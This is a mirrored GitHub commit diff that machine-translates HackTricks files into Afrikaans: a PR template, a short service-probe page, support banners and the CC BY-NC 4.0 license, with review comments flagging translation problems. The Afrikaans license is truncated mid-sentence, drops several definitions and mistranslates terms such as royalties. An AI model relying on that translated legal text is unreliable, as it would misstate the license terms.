mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
Translated to Afrikaans
This commit is contained in:
parent
cfe2830fdd
commit
9f40607d8c
726 changed files with 75997 additions and 65033 deletions
6
.github/pull_request_template.md
vendored
|
@ -1,4 +1,4 @@
|
|||
## Attribution
|
||||
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or have explicit permission to use from the original author. Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
|
||||
## Toewysing
|
||||
Ons waardeer jou kennis en moedig jou aan om inhoud te deel. Maak asseblief seker dat jy slegs inhoud oplaai wat jy besit of uitdruklike toestemming het van die oorspronklike skrywer om dit te gebruik. Jou respek vir intellektuele eiendomsregte bevorder 'n betroubare en wettige deelomgewing vir almal.
|
||||
|
||||
Thank you for contributing to HackTricks!
|
||||
Dankie dat jy bydra tot HackTricks!
|
||||
|
|
|
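Review bot: the heading `## Attribution` is rendered as `## Toewysing`, which in Afrikaans means allocation or assignment rather than giving credit to an author; since the paragraph under it is about only uploading content you own or have explicit permission for, `## Erkenning` (or `## Bronvermelding`) matches the intent. The body paragraph and the closing thank-you line read correctly.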
@ -1,53 +1,27 @@
|
|||
# 1911 - Pentesting fox
|
||||
# 1911 - Pentesting vos
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
And more services:
|
||||
En meer dienste:
|
||||
|
||||
ubiquiti-discover udp "Ubiquiti Networks Device"
|
||||
ubiquiti-ontdek udp "Ubiquiti Networks-toestel"
|
||||
|
||||
dht udp "DHT Nodes"
|
||||
dht udp "DHT-nodes"
|
||||
|
||||
5060 udp sip "SIP/"
|
||||
|
||||
![](<.gitbook/assets/image (273).png>)
|
||||
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
|
||||
|
||||
InfluxDB
|
||||
|
||||
![](<.gitbook/assets/image (337).png>)
|
||||
|
||||
![](<.gitbook/assets/image (338).png>)
|
||||
|
||||
![](<.gitbook/assets/image (339).png>)
|
||||
|
||||
![](<.gitbook/assets/image (340).png>)
|
||||
|
||||
![](<.gitbook/assets/image (341).png>)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (
|
||||
|
|
|
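Review bot: several lines on the original side of this hunk have no translated counterpart: `5060 udp sip "SIP/"`, the `InfluxDB` heading, the `image (337)` to `image (341)` screenshots and the closing support banner appear only once, and the hunk header shows the file shrinking from 53 to 27 lines, so please confirm whether they were meant to be kept. Independently, `ubiquiti-discover` is a probe/service identifier as printed by scanners and should stay untranslated rather than become `ubiquiti-ontdek`; the same applies to `fox` in the `# 1911 - Pentesting fox` heading if it is a product name. The last added line is a truncated image reference (the `(1) (1) ... (` path never closes with `.png>)`) and will not render.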
@ -1,16 +1,14 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
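Review bot: the same support banner is translated differently in each file touched by this commit, which makes future mechanical find-and-replace of the banner unreliable: this hunk has `As jy wil sien dat jou maatskappy geadverteer word` and `GitHub-opslagplekke`, while the 1911 page and LICENSE.md have `As jy jou maatskappy geadverteer wil sien` and `github-opslag`, and LICENSE.md uses `hacktruuks` where the others use `hacking-truuks`. Pick one rendering of the banner and reuse it verbatim across all files.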
@ -19,16 +17,14 @@ Other ways to support HackTricks:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
205
LICENSE.md
|
@ -1,204 +1,151 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> by Carlos Polop is licensed under the <a href="https://creativecommons.org/licenses/by-nc/4.0/">Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)</a>.
|
||||
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>Kopiereg © Carlos Polop 2021. Behalwe waar anders gespesifiseer (die eksterne inligting wat in die boek gekopieer is, behoort aan die oorspronklike outeurs), is die teks op <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> deur Carlos Polop gelisensieer onder die <a href="https://creativecommons.org/licenses/by-nc/4.0/">Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)</a>.
|
||||
|
||||
License: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)<br>
|
||||
Human Readable License: https://creativecommons.org/licenses/by-nc/4.0/<br>
|
||||
Complete Legal Terms: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
|
||||
Formatting: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
|
||||
Lisensie: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)<br>
|
||||
Mensleesbare Lisensie: https://creativecommons.org/licenses/by-nc/4.0/<br>
|
||||
Volledige Regsterme: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
|
||||
Formattering: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
|
||||
|
||||
# creative commons
|
||||
# kreatiewe gemeenskap
|
||||
|
||||
# Attribution-NonCommercial 4.0 International
|
||||
|
||||
Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible.
|
||||
Creative Commons Corporation ("Creative Commons") is nie 'n regspraktyk nie en verskaf nie regsadvies of regsdiens nie. Verspreiding van Creative Commons openbare lisensies skep nie 'n regsverhouding tussen regspraktisyn en kliënt of enige ander verhouding nie. Creative Commons maak sy lisensies en verwante inligting beskikbaar "soos dit is". Creative Commons gee geen waarborge met betrekking tot sy lisensies, enige materiaal wat onder die voorwaardes daarvan gelisensieer is, of enige verwante inligting nie. Creative Commons verwerp alle aanspreeklikheid vir skade wat voortspruit uit die gebruik daarvan tot die volle omvang moontlik.
|
||||
|
||||
## Using Creative Commons Public Licenses
|
||||
## Gebruik van Creative Commons Openbare Lisensies
|
||||
|
||||
Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses.
|
||||
Creative Commons openbare lisensies bied 'n standaardstel voorwaardes wat skeppers en ander reghebbendes kan gebruik om oorspronklike werke van outeurskap en ander materiaal wat onderhewig is aan kopiereg en sekere ander regte soos gespesifiseer in die openbare lisensie hieronder, te deel. Die volgende oorwegings is slegs vir inligtingsdoeleindes, is nie uitputtend nie, en vorm nie deel van ons lisensies nie.
|
||||
|
||||
* __Considerations for licensors:__ Our public licenses are intended for use by those authorized to give the public permission to use material in ways otherwise restricted by copyright and certain other rights. Our licenses are irrevocable. Licensors should read and understand the terms and conditions of the license they choose before applying it. Licensors should also secure all rights necessary before applying our licenses so that the public can reuse the material as expected. Licensors should clearly mark any material not subject to the license. This includes other CC-licensed material, or material used under an exception or limitation to copyright. [More considerations for licensors](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors).
|
||||
* __Oorwegings vir lisensiegevers:__ Ons openbare lisensies is bedoel vir gebruik deur diegene wat gemagtig is om die publiek toestemming te gee om materiaal op maniere te gebruik wat andersins deur kopiereg en sekere ander regte beperk word. Ons lisensies is onherroeplik. Lisensiegevers moet die terme en voorwaardes van die lisensie wat hulle kies, lees en verstaan voordat hulle dit toepas. Lisensiegevers moet ook alle regte verseker voordat hulle ons lisensies toepas, sodat die publiek die materiaal kan hergebruik soos verwag. Lisensiegevers moet enige materiaal wat nie onderhewig is aan die lisensie nie, duidelik merk. Dit sluit ander CC-gelisensieerde materiaal in, of materiaal wat onder 'n uitsondering of beperking tot kopiereg gebruik word. [Meer oorwegings vir lisensiegevers](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors).
|
||||
|
||||
* __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensor’s permission is not necessary for any reason–for example, because of any applicable exception or limitation to copyright–then that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
|
||||
* __Oorwegings vir die publiek:__ Deur een van ons openbare lisensies te gebruik, gee 'n lisensiegever die publiek toestemming om die gelisensieerde materiaal te gebruik onder gespesifiseerde terme en voorwaardes. As die toestemming van die lisensiegever nie nodig is om enige rede nie – byvoorbeeld as gevolg van enige toepaslike uitsondering of beperking tot kopiereg – word daardie gebruik nie deur die lisensie gereguleer nie. Ons lisensies verleen slegs toestemmings onder kopiereg en sekere ander regte waaroor 'n lisensiegever magtig is om toestemming te gee. Die gebruik van die gelisensieerde materiaal kan nog steeds beperk word om ander redes, insluitend omdat ander kopiereg of ander regte in die materiaal het. 'n Lisensiegever mag spesiale versoeke maak, soos om te vra dat alle veranderinge gemerk of beskryf word. Alhoewel dit nie deur ons lisensies vereis word nie, word jy aangemoedig om daardie versoeke te respekteer waar dit redelik is. [Meer oorwegings vir die publiek](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
|
||||
|
||||
# Creative Commons Attribution-NonCommercial 4.0 International Public License
|
||||
# Creative Commons Attribution-NonCommercial 4.0 International Openbare Lisensie
|
||||
|
||||
By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions.
|
||||
Deur die Gelisensieerde Regte (hieronder gedefinieer) uit te oefen, aanvaar en stem jy in om gebonde te wees aan die terme en voorwaardes van hierdie Creative Commons Attribution-NonCommercial 4.0 International Openbare Lisensie ("Openbare Lisensie"). Vir sover hierdie Openbare Lisensie as 'n kontrak geïnterpreteer kan word, word die Gelisensieerde Regte aan jou verleen in oorweging van jou aanvaarding van hierdie terme en voorwaardes, en die Lisensiegever verleen jou sulke regte in oorweging van die voordele wat die Lisensiegever ontvang deur die Gelisensieerde Materiaal beskikbaar te stel onder hierdie terme en voorwaardes.
|
||||
|
||||
## Section 1 – Definitions.
|
||||
## Artikel 1 – Definisies.
|
||||
|
||||
a. __Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image.
|
||||
a. __Aangepaste Materiaal__ beteken materiaal wat onderhewig is aan Kopiereg en Soortgelyke Regte en wat afgelei is van of gebaseer is op die Gelisensieerde Materiaal en waarin die Gelisensieerde Materiaal vertaal, verander, gereël, verander, of andersins gewysig word op 'n wyse wat toestemming vereis onder die Kopiereg en Soortgelyke Regte wat deur die Lisensiegever gehou word. Vir doeleindes van hierdie Openbare Lisensie word Aangepaste Materiaal altyd geproduseer waar die Gelisensieerde Materiaal gesinkroniseer word met 'n bewegende beeld.
|
||||
|
||||
b. __Adapter's License__ means the license You apply to Your Copyright and Similar Rights in Your contributions to Adapted Material in accordance with the terms and conditions of this Public License.
|
||||
b. __Lisensie van die Aanpasser__ beteken die lisensie wat jy toepas op jou Kopiereg en Soortgelyke Regte in jou bydraes tot Aangepaste Materiaal in ooreenstem
|
||||
## Artikel 2 - Omvang.
|
||||
|
||||
c. __Copyright and Similar Rights__ means copyright and/or similar rights closely related to copyright including, without limitation, performance, broadcast, sound recording, and Sui Generis Database Rights, without regard to how the rights are labeled or categorized. For purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights.
|
||||
a. ___Lisensieverlening.___
|
||||
|
||||
d. __Effective Technological Measures__ means those measures that, in the absence of proper authority, may not be circumvented under laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996, and/or similar international agreements.
|
||||
1. Onderworpe aan die bepalings en voorwaardes van hierdie Openbare Lisensie, verleen die Lisensiehouer hiermee aan U 'n wêreldwye, vry van lisensiefooi, nie-onderlisensieerbare, nie-uitsluitlike, onherroeplike lisensie om die Gelisensieerde Regte in die Gelisensieerde Materiaal uit te oefen om:
|
||||
|
||||
e. __Exceptions and Limitations__ means fair use, fair dealing, and/or any other exception or limitation to Copyright and Similar Rights that applies to Your use of the Licensed Material.
|
||||
A. die Gelisensieerde Materiaal, geheel of gedeeltelik, vir nie-kommersiële doeleindes slegs te verveelvoudig en te deel; en
|
||||
|
||||
f. __Licensed Material__ means the artistic or literary work, database, or other material to which the Licensor applied this Public License.
|
||||
B. Aangepaste Materiaal te produseer, te verveelvoudig en te deel vir nie-kommersiële doeleindes slegs.
|
||||
|
||||
g. __Licensed Rights__ means the rights granted to You subject to the terms and conditions of this Public License, which are limited to all Copyright and Similar Rights that apply to Your use of the Licensed Material and that the Licensor has authority to license.
|
||||
2. __Uitsonderings en Beperkings.__ Vir die vermyding van twyfel, waar Uitsonderings en Beperkings van toepassing is op U gebruik, is hierdie Openbare Lisensie nie van toepassing nie, en U hoef nie aan sy bepalings en voorwaardes te voldoen nie.
|
||||
|
||||
h. __Licensor__ means the individual(s) or entity(ies) granting rights under this Public License.
|
||||
3. __Termyn.__ Die termyn van hierdie Openbare Lisensie word gespesifiseer in Artikel 6(a).
|
||||
|
||||
i. __NonCommercial__ means not primarily intended for or directed towards commercial advantage or monetary compensation. For purposes of this Public License, the exchange of the Licensed Material for other material subject to Copyright and Similar Rights by digital file-sharing or similar means is NonCommercial provided there is no payment of monetary compensation in connection with the exchange.
|
||||
4. __Media en formate; tegniese wysigings toegelaat.__ Die Lisensiehouer gee U toestemming om die Gelisensieerde Regte in alle media en formate uit te oefen, hetsy nou bekend of hierna geskep, en om tegniese wysigings te maak wat nodig is om dit te doen. Die Lisensiehouer doen afstand van en/of stem daarmee saam om enige reg of gesag te ontken om U te verbied om tegniese wysigings te maak wat nodig is om die Gelisensieerde Regte uit te oefen, insluitend tegniese wysigings wat nodig is om Effektiewe Tegnologiese Maatreëls te omseil. Vir doeleindes van hierdie Openbare Lisensie, produseer die eenvoudige maak van wysigings wat deur hierdie Artikel 2(a)(4) gemagtig word nooit Aangepaste Materiaal nie.
|
||||
|
||||
j. __Share__ means to provide material to the public by any means or process that requires permission under the Licensed Rights, such as reproduction, public display, public performance, distribution, dissemination, communication, or importation, and to make material available to the public including in ways that members of the public may access the material from a place and at a time individually chosen by them.
|
||||
5. __Ontvangers van stroomaf.__
|
||||
|
||||
k. __Sui Generis Database Rights__ means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world.
|
||||
A. __Aanbod van die Lisensiehouer - Gelisensieerde Materiaal.__ Elke ontvanger van die Gelisensieerde Materiaal ontvang outomaties 'n aanbod van die Lisensiehouer om die Gelisensieerde Regte uit te oefen onder die bepalings en voorwaardes van hierdie Openbare Lisensie.
|
||||
|
||||
l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning.
|
||||
B. __Geen stroomafbeperkings nie.__ U mag geen addisionele of verskillende terme of voorwaardes aanbied of opleg op die Gelisensieerde Materiaal nie, as dit die uitoefening van die Gelisensieerde Regte deur enige ontvanger van die Gelisensieerde Materiaal beperk nie.
|
||||
|
||||
## Section 2 – Scope.
|
||||
6. __Geen goedkeuring.__ Niks in hierdie Openbare Lisensie stel of mag beskou word as toestemming om te beweer of te impliseer dat U, of dat U gebruik van die Gelisensieerde Materiaal, verband hou met, of gesponsoreer, ondersteun, of amptelike status verleen deur, die Lisensiehouer of ander persone wat aangewys is om erkenning te ontvang soos voorsien in Artikel 3(a)(1)(A)(i).
|
||||
|
||||
a. ___License grant.___
|
||||
b. ___Ander regte.___
|
||||
|
||||
1. Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to:
|
||||
1. Morele regte, soos die reg op integriteit, word nie onder hierdie Openbare Lisensie gelisensieer nie, en ook nie publisiteit, privaatheid, en/of ander soortgelyke persoonlikheidsregte nie; egter, vir sover moontlik, doen die Lisensiehouer afstand van en/of stem daarmee saam om enige sulke regte wat deur die Lisensiehouer gehou word, tot die beperkte mate wat nodig is om U in staat te stel om die Gelisensieerde Regte uit te oefen, maar andersins nie.
|
||||
|
||||
A. reproduce and Share the Licensed Material, in whole or in part, for NonCommercial purposes only; and
|
||||
2. Patent- en handelsmerkregte word nie onder hierdie Openbare Lisensie gelisensieer nie.
|
||||
|
||||
B. produce, reproduce, and Share Adapted Material for NonCommercial purposes only.
|
||||
3. Vir sover moontlik, doen die Lisensiehouer afstand van enige reg om koninklike te erf van U vir die uitoefening van die Gelisensieerde Regte, hetsy direk of deur 'n inwinninggenootskap onder enige vrywillige of afstanddoenbare statutêre of verpligte lisensiëringskema. In alle ander gevalle behou die Lisensiehouer uitdruklik enige reg voor om sulke koninklike in te samel, insluitend wanneer die Gelisensieerde Materiaal gebruik word vir nie-kommersiële doeleindes nie.
|
||||
|
||||
2. __Exceptions and Limitations.__ For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public License does not apply, and You do not need to comply with its terms and conditions.
|
||||
|
||||
3. __Term.__ The term of this Public License is specified in Section 6(a).
|
||||
## Artikel 3 - Lisensievoorwaardes.
|
||||
|
||||
4. __Media and formats; technical modifications allowed.__ The Licensor authorizes You to exercise the Licensed Rights in all media and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The Licensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications necessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective Technological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4) never produces Adapted Material.
5. __Downstream recipients.__
U uitoefening van die Gelisensieerde Regte is uitdruklik onderhewig aan die volgende voorwaardes.
A. __Offer from the Licensor – Licensed Material.__ Every recipient of the Licensed Material automatically receives an offer from the Licensor to exercise the Licensed Rights under the terms and conditions of this Public License.
a. ___Toekennings.___
